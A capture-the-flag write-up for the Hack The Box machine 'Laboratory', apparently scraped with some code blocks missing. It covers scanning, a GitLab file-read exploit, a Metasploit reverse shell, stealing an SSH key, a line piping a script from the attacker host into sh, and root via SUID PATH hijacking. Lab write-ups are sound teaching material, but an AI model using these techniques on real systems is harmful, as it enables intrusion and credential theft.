Last updated
Last updated
nmap -sV -T4 -p- 10.10.10.216
Accessing the IP address via HTTP returns a 302 status code, and redirects to https://laboratory.htb/
Add the following line to the /etc/hosts
file:
Now the page displays properly.
If we scroll down, we can see that Dexter is listed as the CEO of the company.
Looking at the source code:
Navlinks commented out. However, elements.html
and generic.html
do not exist.
gobuster dir -u https://laboratory.htb/ -w /usr/share/wordlists/dirb/common.txt -k
When I first ran gobuster without the -w
flag, I got this error:
So I added the following to /etc/hosts
:
and accessed git.laboratory.htb
.
searchsploit gitlab
I went ahead and created an account. Note: to overcome the email domain validation, use @laboratory.htb
for the email domain.
(for Gitlab 12.9.0 - Arbitrary File Read)
python3 gitlab_exploit.py https://git.laboratory.htb me zeyu2001
We can read the /etc/passwd
file:
Didn't work with any of the open-source Python scripts. If this was the actual OSCP, I would have used my Metasploit 'budget' on this machine.
Using Metasploit with the above options, I was able to spawn a reverse shell.
'Upgrade' the shell: python3 -c 'import pty;pty.spawn("/bin/bash")'
Since Dexter is likely the 'main user', I guessed that his user ID is 1.
Full commands to reset the password via Rails Console:
Using the dexter:mynewpass
combination, we can login to the GitLab web GUI.
I then tried to SSH into Dexter's account, but a public/private key pair is required.
From the SecureDocker repo, we can navigate to securedocker/dexter/.ssh/id_rsa
to get the private key. Save this in a file id_rsa
on the attacking machine. Note that the public key for this privste key is in the securedocker/dexter/.ssh/authorized_keys
file.
SSH in: ssh -i id_rsa dexter@git.laboratory.htb
. We can now get the user.txt
:
Run LinPEAS (start Python Simple HTTP Server on attacking machine, then do curl "http://10.10.14.16/linpeas.sh" | sh
in SSH)
Sadly, neither worked.
In the list of SUID files (from the LinPEAS output), the /usr/local/bin/docker-security
binary looked out of place.
Strings wasn't installed on the target machine, so I downloaded the binary into my Kali machine: scp -i id_rsa dexter@laboratory.htb:/usr/local/bin/docker-security .
strings docker-security
Good, the binary uses relative paths for setuid
, etc. This allows us to create our own setuid
binary, and manipuate the PATH variable so that our own binary is executed instead.
Change working directory to /tmp
: cd /tmp
Copy the /bin/sh
shell and call it setuid
: echo /bin/sh > setuid
Give the correct permissions: chmod 777 setuid
Put its location, the /tmp
directory, in the PATH: export PATH=/tmp:$PATH
Since the SUID flag is set, the /bin/sh
is run as root
, which is the owner of the file. Here, we created a fake setuid
binary and added the /tmp
directory to the PATH. When the docker-security
binary runs setuid
, our fake binary is run, spawning a bash shell as root.
Found an exploit code here:
Now that we gained a shell as the git
user, we are inside the gitlab-rails
CLI. In order to gain access to Dexter's account, we need to reset the password, like this:
Writeup for Laboratory from Hack the Box